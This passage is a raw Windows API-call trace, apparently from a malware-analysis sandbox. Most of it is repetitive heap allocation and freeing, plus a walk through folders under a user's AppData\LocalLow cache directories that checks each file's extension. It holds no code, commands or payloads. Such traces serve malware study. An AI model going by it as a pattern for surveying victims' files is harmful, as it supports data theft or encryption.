hHeap=0x660000) returned 1 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.228] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.228] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.229] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0061.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e7e8 [0061.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adf40 [0061.229] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.229] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0061.229] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0061.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adf40 | out: hHeap=0x660000) returned 1 [0061.230] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0061.230] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261528 [0061.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0061.230] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86d58 [0061.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0061.230] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0061.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e7e8 | out: hHeap=0x660000) returned 1 [0061.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e7e8 [0061.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86d58 | out: hHeap=0x660000) returned 1 [0061.230] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.230] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e7e8 | out: hHeap=0x660000) returned 1 [0061.230] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.230] PathFindFileNameW (pszPath="") returned="" [0061.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.230] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.231] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.231] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 1 [0061.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd0) returned 0x31e9450 [0061.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd0) returned 0x9c808d8 [0061.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x38) returned 0x327cb80 [0061.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262d20 | out: hHeap=0x660000) returned 1 [0061.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd0) returned 0x9c809b0 [0061.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c808d8 | out: hHeap=0x660000) returned 1 [0061.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31e9450 | out: hHeap=0x660000) returned 1 [0061.231] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 0 [0061.232] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0061.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262f18 | out: hHeap=0x660000) returned 1 [0061.232] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290508 [0061.232] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290450 | out: hHeap=0x660000) returned 1 [0061.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0061.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.233] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\") returned="Content\\" [0061.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262f18 [0061.233] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0061.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0061.233] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0061.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.233] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261528 [0061.233] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86d58 [0061.233] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.234] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.234] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.234] PathFindFileNameW (pszPath="") returned="" [0061.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.234] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.234] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.234] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf9eaad0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf9eaad0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf9eaad0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cAlternateFileName="024823~1")) returned 1 [0061.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.234] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0061.234] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bd8410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bd8410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe98d390, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x561, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cAlternateFileName="0F1583~1")) returned 1 [0061.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.234] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0061.234] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf952550, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf952550, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf952550, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cAlternateFileName="1BB09B~1")) returned 1 [0061.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.234] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0061.235] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4c00edb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c00edb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4c00edb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xf1d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1DAF2884EC4DFA96BA4A58D4DBC9C406", cAlternateFileName="1DAF28~1")) returned 1 [0061.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x106) returned 0x32452d8 [0061.235] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0061.235] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x580eb5c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, 